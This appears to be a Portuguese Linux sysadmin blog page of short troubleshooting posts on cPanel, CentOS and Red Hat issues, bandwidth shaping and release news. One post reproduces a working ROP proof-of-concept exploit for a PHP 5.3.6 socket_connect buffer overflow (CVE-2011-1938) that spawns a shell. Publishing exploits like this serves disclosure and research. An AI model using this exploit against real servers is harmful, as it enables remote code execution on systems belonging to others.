WARNING: 'require 'rake/rdoctask'' is deprecated. Please use 'require 'rdoc/task'

Standard

Em um ambiente CPANEL se isto estiver ocorrendo você necessitará de um downgrade no Rake.

Para isto, você deve saber a exata versão do rake do seu Ruby on Rails, no meu caso de exemplo:

 

gem uninstall rake -v 0.9.2.2 
gem uninstall rake -v 0.9.2 

Rode os dois comandos acima para tentar achar a versão 0.9.2, por exemplo, depois de feitos os comandos use o comando para instalar o rake mais antigo:

gem install rake -v 0.8.7

Feito isto é só alegria!

localhost did not have any working mirrors. Please check your internet connection or dns server. at /usr/local/cpanel/Cpanel/HttpRequest.pm line 596.

Standard

Se toda vez que você tenta rodar o EASYAPACHE esse erro é exibido, nada de pânico, existem 2 coisas a serem verificadas ( erro é localhost did not have any working mirrors. Please check your internet connection or dns server. at /usr/local/cpanel/Cpanel/HttpRequest.pm line 596. ):

Vá no /etc/resolv.conf e adicione isto no começo do arquivo:

nameserver 8.8.8.8

nameserver 8.8.4.4

Ambos são dns da GOOGLE.
Tente novamente, se não rodar é por que seu arquivo /etc/hosts tem uma entrada de ip inválida ou um host inválido para o nome do seu servidor, quando na verdade deve ficar como loopback, veja um exemplo de COMO deveria ser o seu /etc/hosts:

127.0.0.1               localhost localhost.localdomain
ip.da.internet.publico          hostname.domeudomínio.com.br hostname

 

Como extrair arquivos .RAR no CENTOS?

Standard

É bem verdade que o CentOS tem tudo que o Red Hat tem + um grande apoio da comunidade, mas tente abrir um arquivo .rar via console para você ver o que é bom para tosse 😛

Brincadeiras a parte, não é uma falha da distribuição em si, tampouco repositórios ruins, muito pelo contrário, como a idéia maior de compactação gira em torno de .zip, .tar, .tar.gz a maior parte das distribuições vêm dispostas a encarar facilmente tais formatos. Bem, se queremos abrir o .RAR no Centos teremos de fazer uma coisa, instalar o pacote de arquivos para trabalhar com formato .rar, “vamo simbora”?

Se o RedHat for 6 e for 64 bits rode como root:

rpm -Uhv http://apt.sw.be/redhat/el6/en/x86_64/rpmforge/RPMS/unrar-3.9.10-1.el6.rf.x86_64.rpm

Se precisar de outro rpm do unrar em detrimento de versões do centos ou mesmo por estar usando outra distribuição veja o link:

http://pkgs.org/centos-6-rhel-6/repoforge-x86_64/unrar-3.9.10-1.el6.rf.x86_64.rpm.html

Instalando este pacote há uma pequena lógica no comando, explico logo abaixo:

unrar e nomedoarquivo.rar

O comando acima extrai o arquivo na pasta atual onde ele está.

unrar l nomedoarquivo.rar

O comando acima lista o que tem dentro do arquivo compactado.

unrar t nomedoarquivo.rar

O comando acima checa a integridade do arquivo compactado.

Bom pessoALL, em resumo é isto ;).

Abraços e bom trabalho + final de semana show de bola!

Red Hat, Centos, Fedora e Rhel Based com intel E1000 (e1000e) apresentando queda de rede

Standard

Uma coisa interessante, na verdade um bug no módulo de rede E1000 (Intel GB) está ocorrendo em plataformas Rhel Based (Red Hat 5.x e 6.x e Fedora 16) onde o sistema operacional simplesmente deixa a interface de rede trabalhando, do nada a mesma apresenta congelamento (isto mesmo, o sistema continua on, mas a interface de rede OFF). Não adiantará muito atualizar o Kernel, pois ele não trará a solução. Abaixo irei dar dicas de como resolver, no meu caso fui vitimado sob Centos 6.2:

Como root execute:

lsmod | grep e1000

Se a resposta for:

e1000e

Execute o comando como root:

modinfo e1000e

Na saída, logo no começo, veja se a informação do módulo é esta:

version: 1.4.4-k

Caso seja é JUSTAMENTE a cabrita bugada, para sanar vamos ativar um repositório com rpms fresquinhos:

CentOS 6.x -> rode como root:

rpm -Uvh http://elrepo.org/elrepo-release-6-4.el6.elrepo.noarch.rpm

CentOS 5.x -> rode como root:

rpm -Uvh http://elrepo.org/elrepo-release-5-3.el5.elrepo.noarch.rpm

Depois, como root rode:

yum install kmod-e1000e.x86_64 -y

Depois será necessário um reboot no servidor.
Assim que o servidor levantar rode:

modinfo e1000e

Veja se está como abaixo:

[root@appunixlabs ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.17.1.el6.x86_64/weak-updates/e1000e/e1000e.ko
version: 1.11.3-NAPI

 

Devemos forçar o kernel a utilizar alguns recursos a menos para que possamos contornar o bug, vamos forçar o consumo de energia ao invés de poupar (infelizmente TI verde não é com essa NIC -> Active-State Power Management tem de estar OFF), entre no grub.conf e informa a linha abaixo no final da instrução de boot do kernel utilizado por seu sistema:

pcie_aspm=off e1000e.IntMode=1,1 e1000e.InterruptThrottleRate=10000,10000 acpi=off

 

Se você receber Kernel Panic por causa das flags acima, entre novamente no servidor com qualquer outra imagem de kernel e informe no final da primeira instrução de kernel que apresentava Kernel Panic:

pcie_aspm=off

Somente a flag acima e deixa o pau quebrar.

 

Bug informado em:

https://bugzilla.redhat.com/show_bug.cgi?id=632650

https://bugzilla.redhat.com/show_bug.cgi?id=808638

https://bugzilla.redhat.com/show_bug.cgi?id=625776

http://bugs.centos.org/view.php?id=5614

 

Como adicionar uma flag no grub sem problemas no CentOS, Fedora ou RedHat?

Standard
grubby --grub --args="pcie_aspm=off" --update-kernel=ALL
Use o comando acima para adicionar a flag pcie_aspm=off como instrução no Boot do seu Linux.
Depois de adicionar será necessário reiniciar o sistema.
Perceba que o ajuste também poderia ter sido feito manualmente, bastando apenas acrescentar
pcie_aspm=off no final da instrução de boot da imagem do kernel.

Abraços galera.

			

WHM sumiu com meus ips adicionados anteriormente e ao tentar adicionar novamente aparece a mensagem is already…

Standard

Calma, sem problemas.
Se conseguir entre como root e rode o seguinte comando:

 

/etc/rc.d/init.d/ipaliases restart

Depois veja no whm se os ips voltaram, caso ainda assim não tenha retornado rode
chkconfig --list ipaliases

Verifique também (caso os comando acima não sanem seu problema) os arquivos:

/etc/ips e /etc/ipaddrpool

Abraços.

 

PHP Warning: Module 'timezonedb' already loaded in Unknown on line 0

Standard

Para resolver isto é simples, entre no arquivo php.ini (em rhel based pode ser encontrado em /usr/local/lib/php.ini), bastando apenas entrar e remover as linhas duplicadas que contém:

extension=”timezonedb.so”

Removendo as linhas duplicadas rode: service httpd restart ou /etc/init.d/apache2 restart e curta!

Como mudar/alterar o hostname do computador no CentOS | RedHat

Standard

Olá amigos tudo tranqüilo?

Seguindo a dica do mestre @little_oak, resolvi dar uma chance no que tange a Server com Linux e resolvi instalar o CentOS…. porque até agora meu coração só tinha lugar para o magnífico Ubuntu…. Fiz a install em modo texto (acho melhor e mais rápido), só que em momento algum durante da instalação fui perguntado sobre o hostname da máquina, então veio a dúvida…. como mudar/alterar o hostname aqui nessa mazela? Acostumado com o Ubuntu fui logo no /etc/hostname …. PAM…. cadê?

O CentOS não possui esse arquivo, logo pensei maldita mudança…. mas não desisti, lembrei-me que o professor da Software Livre na faculdade havia falado sobre algo desse tipo no RedHat….. logo pensei, se CentOS é o irmão gêmeo do RedHat logo deve funcionar no CentOS também…. vou passar pra você o macete….

No Terminal como root vá até o diretório /etc/sysconfig/

Dentro desse diretórioa existem vários arquivos, maseditar um arquivo chamado network, e é ele que vamos alterar para mudar/alterar nosso hostname…. eu utilizo o VI ou VIM por achar mais prátido e rápido mas fica a gosto de vocês

 

root@localhost sysconfig]# vim network

 

Verá um conteúdo mais ou menos assim

 NETWORKING=yes

NETWORKING_IPV6=no

HOSTNAME=localhost.localdomain

 

Não precisa nem falar qual o campo a ser alterado não é? Deixe como achar melhor, no meu caso ficou assim:

 NETWORKING=yes

NETWORKING_IPV6=no

HOSTNAME=appunix.localdomain

 

O único ponto negative dessa alteração de hostname é que torna-se necessário a reinicialização do CentOS para que essa alteração entre em vigor…. para testar, você pode digitar hostname no Terminal e verá o nome para o qual você alterou…..

Simples, sucinto e rápido… enfim consegui fazer algo objetivo sem muitas firulas…..

Abraço forte galera….

Obrigado pelo sucesso do BLOG, todas as honras dadas a vocês leitores e a DEUS.

Fiquem com Deus!!!!!!!

Gostou? Compartilhe, comente e espalhe. 🙂

Fullbackup parando no meio do caminho em algumas contas no CPANEL

Standard

Existe uma coisa estranha, e acontece mais do que imaginamos!

Já viu um fullbackup simplesmente parar no meio do caminho (pkgacct via console, por exemplo)?

Ou um user reclama que o backup está incompleto ou foi restaurar e o site não funfa mais? (um cms, por exemplo, como wordpress)

Isto ocorre em detrimento a limites do mysql (normalmente é esta a causa) no momento de gerar o dump, veja mais abaixo.

Um passo a segu1r é o seguinte, como root devemos executar o seguinte comando:

tail -f /usr/local/cpanel/logs/error_log

Se a saída do log (recomendo fazer isso via screen, por exemplo) for essa:

Script::Pkgacct::__ANON__() called at /scripts/pkgacct line 2154
Script::Pkgacct::run_dot_event(CODE(0x2b3d547e1050)) called at /scripts/pkgacct line 1141
Script::Pkgacct::script(‘Script::Pkgacct’, ‘LOGINDOCLIENTE‘) called at /scripts/pkgacct line 85
[UMA DATA] warn [pkgacct] LOGINDOCLIENTE_NOMEDOBD: mysqldump: Couldn’t execute ‘SHOW TRIGGERS LIKE ‘bl\_NOMEDOBD”: Got error 28 from storage engine (1030)
at /scripts/pkgacct line 1535
Script::Pkgacct::_check_error_file(‘LOGINDOCLIENTE_NOMEDOBD‘, ‘/home/cpmove-LOGINDOCLIENTE/mysql/LOGINDOCLIENTE_NOMEDOBD.sql.err’) called at /scripts/pkgacct line 1504
Script::Pkgacct::mysqldumpdb(HASH(0x2b3d547e1000)) called at /scripts/pkgacct line 1138
Script::Pkgacct::__ANON__() called at /scripts/pkgacct line 2154
Script::Pkgacct::run_dot_event(CODE(0x2b3d547e1050)) called at /scripts/pkgacct line 1141
Script::Pkgacct::script(‘Script::Pkgacct’, ‘LOGINDOCLIENTE‘) called at /scripts/pkgacct line 85

É simples de sanar!

Entre no /etc/my.cnf e comente as linhas que limitam uso de memória de cache (principalmente as de querys) do mysql.
Feito isto:

service mysql restart

Depois mande gerar o backup!

 

Se o problema não for resolvido veja se o erro é de EOF (end of file), se isso rolar, analise o disco, ou load (i/o no geral), pois pode ser falha no disco ou overload.
Abraços galera.

/usr/sbin/repquota -auv highest load 100% cpu usage (load) How to solve (COMO RESOLVER)

Standard

Essa dica SANA o problema junto ao processo /usr/sbin/repquota -auv, o qual o cpanel o executa sozinho, do nada (e como quem quer nada), lol, e o pior, não adianta dar killall, kill -9, kill np que ele não encerra, isto é fato!!! Vamos parar de preencher a linguiça e sanar o negócio?

Bem, alguns passos podem ser seguidos para sanar, digamos que irei colocar do nível mais simples ao mais curioso de todos, ok?

Tente o seguinte [como root]:

rm /home/quota.group
rm /home/quota.user

/scripts/fixquotas

Se o processo ainda insistir em ficar como louco checa se seu disco está operando em ready only, uma forma de tentar isto é fazer assim:

touch /home/qualquercoisa e em seguida digitar stat /home/qualquercoisa, se mostrar somente leitura é hora de um reboot (e de preferência um fsck por parte do IDC).

Outro ponto extra é você executar o upcp –force e ver se o processo inicia, caso não, observe na hora (normalmente madrugada) se o processo executa e em seguida opera com o repquota, se isso ocorrer realmente é o versionamento ferrado, mude o estilo de update e faça upcp –force (normalmente release ou stable são os mais recomendados, troque um pelo outro e lembre-se de proteger com chattr os arquivos que lhe são importantes e o cpanel pode os sobrescrever (customizações, por exemplo, em temas do cpanel)).

Vamos finalizar com a dica mais extra?

lsattr /*.user

Se exibir proteções do tipo i–A, meu amigo, tira essa praga daí —-> chattr -iA /*.user

Com isso rode o comando na mão e veja que glorioso.

Se a glória não ocorrer você precisara aprofundar as coisas:

1. Identificar que partições estão usando sistema de quotas,
================
root@appunixlabs [~]# cat /etc/fstab | grep quota
LABEL=/ / ext3 defaults,usrquota 1 1
LABEL=/home /home ext3 defaults,usrquota 1 2
LABEL=/usr /usr ext3 defaults,usrquota 1 2
LABEL=/var /var ext3 defaults,usrquota 1 2
================

2. Reiniciar o Servidor e entrar em Single mode.

3. Rodar um fsck para cada partição (modo forçado)-> fsck -f /dev/sdX#

4. Recriar o sistema de journaling para cada partição. (tune2fs -O ^has_journal /dev/sdX#;tune2fs -O has_journal /dev/sdX#)

5. Rodar um fsck PADRÃO para cada partição.

6. rodar o comando /scripts/fixquotas

7. Reiniciar o sistema.

Fonte:
http://www.littleoak.com.br/2011/08/01/usrsbinrepquota-auv-consumindo-toda-cpu-100-overload-cpanel/ (meu velho blog)

Como fazer QoS de banda (controle de banda) no Ubuntu Server, Debian, Fedora, Centos, RedHat e etc

Standard

Vamos perceber o seguinte.
Esse how to serve para TODAS as distribuições que rodam como um gateway de internet, sendo somente um caso de particularidade a questão de paths de configurações, como por exemplo, para instalar o CBQ no ubuntu basta usar apt-get install shaper -y.
Isto instalará ele e basta você localizar o path aonde o script shaper está (/etc/init.d/shaper) e seus respectivos confs (/etc/shaper).
No caso das outras distribuições (red hat based -> Centos, Fedora e Red Hat) podemos ver que seu path fica em /etc/sysconfig/cbq. No caso de red hat já existe um arquivo de exemplo que serve para mostrar como as coisas são configuradas no padrão, seu nome é cbq-0000.example e existe outro mas é um caso de utilização do próprio CBQ, o avpkt.
Neste caso iremos criar tudo na mão.
Antes de por a mão na massa temos de entender algumas regras PRIMÁRIAS do CBQ.
Abaixo seguem as mesmas:

O nome dos arquivos de download

cbq-0002-download.in

Todos os arquivos de download devem obedecer a algumas regras na hora de serem nomeados. A primeira delas é que todos os arquivos de download devem começar com cbq-

cbq-0002-download.in

A numeração sempre deve começar a partir do 0002;

cbq-0002-download.in

Todos os arquivos devem terminar com .in

cbq-0002-download.in

O conteúdo dos arquivos de download

DEVICE=eth1,10Mbit,1Mbit
RATE=64Kbit
WEIGHT=6Kbit
PRIO=5
RULE=10.0.0.2
BOUNDED=yes
ISOLATED=yes

DEVICE=eth1,10Mbit,1Mbit – Esta linha contém a interface que sai para os clientes da rede.
RATE=64Kbit – Quantidade de banda destinada ao cliente. Aqui coloca-se qualquer valor que se deseje separar para o IP do cliente.
WEIGHT=6Kbit – Taxa máxima de download que o cliente pode alcançar (com pequenas variações para mais ou para menos).
PRIO=5 – Prioridade com que o IP do cliente deve ser vigiado. O normal é deixar 5.
RULE=10.0.0.2 – IP do cliente a ser vigiado.
BOUNDED=yes – Se setado para yes o usuário estará limitado mesmo que o link esteja com folga.
ISOLATED=yes – Se setado para yes indica que o cliente não poderá emprestar banda pra ninguem.

Arquivos de upload
O nome dos arquivos de upload

cbq-0002-upload.out

Todos os arquivos de upload devem obedecer a algumas regras na hora de serem nomeados. A primeira delas é que todos os arquivos de upload devem começar com cbq-

cbq-0002-upload.out

A numeração sempre deve começar a partir do 0002;

cbq-0002-upload.out

Todos os arquivos devem terminar com .out

cbq-0002-upload.out

O conteúdo dos arquivos de upload

DEVICE=eth1,10Mbit,1Mbit
RATE=64Kbit
WEIGHT=6Kbit
PRIO=5
RULE=10.0.0.2,
BOUNDED=yes
ISOLATED=yes

DEVICE=eth1,10Mbit,1Mbit – Esta linha contém a interface que sai para os clientes da rede.
RATE=64Kbit – Quantidade de banda destinada ao cliente. Aqui coloca-se qualquer valor que se deseje separar para o IP do cliente.
WEIGHT=6Kbit – Taxa máxima de download que o cliente pode alcançar (com pequenas variações para mais ou para menos).
PRIO=5 – Prioridade com que o IP do cliente deve ser vigiado. O normal é deixar 5.
RULE=10.0.0.2, – IP do cliente a ser vigiado. Observe que no arquivo de upload, o IP termina com uma vírgula (,).
BOUNDED=yes – Se setado para yes o usuário estará limitado mesmo que o link esteja com folga.
ISOLATED=yes – Se setado para yes indica que o cliente não poderá emprestar banda pra ninguem.

Iniciando o CBQ

Depois de criadas todas as regras, é preciso compilá-las, com o comando (isto em fedora, redhat e centos):

root@appunixlabs~# cbq compile

No caso do Debian, Ubuntu, Mint e similares:

root@appunixlabs~# /etc/init.d/shaper compile

Basta, depois da compilação, iniciar o CBQ com o comando (isto em fedora, redhat e centos):

root@appunixlabs~# cbq start

No caso do Debian, Ubuntu, Mint e similares:

root@appunixlabs~# /etc/init.d/shaper start

Ou se desejar pará-lo (isto em fedora, redhat e centos):

root@appunixlabs~# cbq stop

No caso do Debian, Ubuntu, Mint e similares:

root@appunixlabs~# /etc/init.d/shaper stop

CBQ na inicialização

Adicione o comando cbq start ao rc.local para que carregue sozinho no ato do boot
(isto em fedora, redhat e centos):

root@appunixlabs~# echo "cbq start" >> /etc/rc.local

No caso do Debian, Ubuntu, Mint e similares:

root@appunixlabs~# echo "/etc/init.d/shaper start" >> /etc/rc.local

Fontes:

http://www.ubuntu.com/ubuntu (ubuntu)
http://www.debian.org/ (debian)
http://centos.org/ (centos)
http://www.projetofedora.org/ (fedora)
http://sourceforge.net/projects/cbqinit/ (cbq)
http://migre.me/5gcMr (cbq sob fedora)

Centos 6.0 Lançado e Pronto para DOWNLOAD

Standard

CentOS CentOS 6.0, a Linux distribution built from source RPM packages for Red Hat Enterprise Linux 6.0, has been released: “We are pleased to announce the immediate availability of CentOS 6.0 for i386 and x86_64 architectures. CentOS 6.0 is based on the upstream release EL 6.0 and includes packages from all variants. All upstream repositories have been combined into one, to make it easier for end users to work with. There are no CD images being released with CentOS 6, however we have some CD variants in the pipeline. Since upstream has a 6.1 version already released, we will be using a Continuous Release repository for 6.0 to bring all 6.1 and post 6.1 security updates to all 6.0 users, till such time as CentOS 6.1 is released. Read the release announcement and release notes for detailed information and upgrade instructions. Download (mirror list): CentOS-6.0-i386-bin-DVD.iso (4,487MB, SHA256, torrent), CentOS-6.0-x86_64-bin-DVD1.iso (4,042MB, SHA256, torrent).

 

Fonte: http://distrowatch.com/6775

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

Standard

/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)n";
echo "[+] CVE-2011-1938nn";

# Gadgets in /usr/bin/php
define('DUMMY', "x42x42x42x42"); // padding
define('STACK', "x20xbax74x08"); // .data 0x46a0 0x874ba20
define('STACK4', "x24xbax74x08"); // STACK + 4
define('STACK8', "x28xbax74x08"); // STACK + 8
define('STACK12', "x3cxbax74x08"); // STACK + 12
define('INT_80', "x27xb6x07x08"); // 0x0807b627: int $0x80
define('INC_EAX', "x66x50x0fx08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "x60xb4x09x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "x84x3ex12x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "xc7x48x06x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "x18x45x06x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "x20x26x07x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "x23x26x07x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "x0fx4dx21x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "xe3x3bx1fx08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Fonte: http://www.exploit-db.com/exploits/17486/

Como instalar YUM no Red Hat 4 ou Centos 4

Standard

Essa é uma questão muito comum entre os sysadmins que tentam instalar o yum no red hat 4 ou centos 4 e não têm tido sucesso.

Abaixo preparei um how to com um link próprio dos arquivos para que você não tente encontrar o pacote na web e acabe se decepcionando ao ver navios.

Para instalar o yum no centos ou redhat siga exatamente o que será descrito.

Esse how to mostra como instalar o yum no RedHat 4.x (centos 4.x) de maneira simples e amigável.

O que será preciso?

1 – Estar logado como root no terminal,
2 – Criar um diretório aonde as coisas estarão armazenadas,
3 – Ter uma internet acessível para poder baixar (claro!).

Logue-se como root, em seguida, na pasta root crie algo como:

mkdir tmp
cd tmp

Agora que estamos dentro de /root/tmp nós iremos baixar todos os arquivos necessários e iremos deixar que o próprio yum dê conta do recado. Use exatamente os comandos abaixo para pegar os arquivos:

wget http://www.libphp.net/repositorio/yum-2.4.2-0.4.el4.rf.noarch.rpm
wget http://www.libphp.net/repositorio/libsqlite-2.8.15-1.i386.rpm
wget http://www.libphp.net/repositorio/python-elementtree-1.2.6-7.el4.rf.i386.rpm
wget http://www.libphp.net/repositorio/python-sqlite-0.5.0-1.2.el4.rf.i386.rpm
wget http://www.libphp.net/repositorio/python-urlgrabber-2.9.7-1.2.el4.rf.noarch.rpm

Agora que já temos os arquivos (pacotes) vamos instalar os mesmos:

rpm -ivh libsqlite-2.8.15-1.i386.rpm
rpm -ivh python-elementtree-1.2.6-7.el4.rf.i386.rpm
rpm -ivh python-sqlite-0.5.0-1.2.el4.rf.i386.rpm
rpm -ivh python-urlgrabber-2.9.7-1.2.el4.rf.noarch.rpm
rpm -ivh yum-2.4.2-0.4.el4.rf.noarch.rpm

Vamos ajustar o repositório:

wget http://www.libphp.net/repositorio/rpmforge-release-0.3.6-1.el4.rf.i386.rpm

Após

rpm -ivh rpmforge-release-0.3.6-1.el4.rf.i386.rpm

Depois disto somente faça:

yum update

Pronto!

Updates (alerta) de Hoje

Standard

Red Hat Disponibilizou updates para o ruby (RHEL4, RHEL5, RHEL6: denial of service, code execution, and arbitrary file deletion).

Scientific Linux Disponibilizou updates para systemtap (SL6: denial of service), ruby (SL6: denial of service, code execution, and arbitrary file deletion), and sssd (SL6: denial of service).

SUSE Disponibilizou updates para kernel (19 CVE numbers, one from 2009).

Lançado Red Hat Enterprise Linux 6.1

Standard

Red Hat anunciou a disponibilidade do Red Hat Enterprise Linux 6.1 (RHEL 6.1). As atualizações da versão release de novembro do ramo RHEL 6,0, com uma variedade de aprimoramentos de desempenho diz que lhe permitiu entregar um benchmark record-setting SPECvirt_sc2010 sendo executado em um servidor HP Proliant 20-core Blade.

A Red Hat também destaca melhorias no RHEL 6.1, como novas opções de configuração para armazenamento avançado, como Fibre Channel over Ethernet (FCoE), Datacenter Bridging e iSCSI e melhorias em virtualização, sistemas de arquivos, programação, gerenciamento de recursos e funcionalidades de alta disponibilidade.

Notas de lançamento e notas técnicas estão disponíveis com maiores detalhes sobre todas as mudanças feitas no RHEL 6.1.
[1] Red Hat Release Notes 6.1 http://docs.redhat.com/docs/en-US/Re…tes/index.html

[via]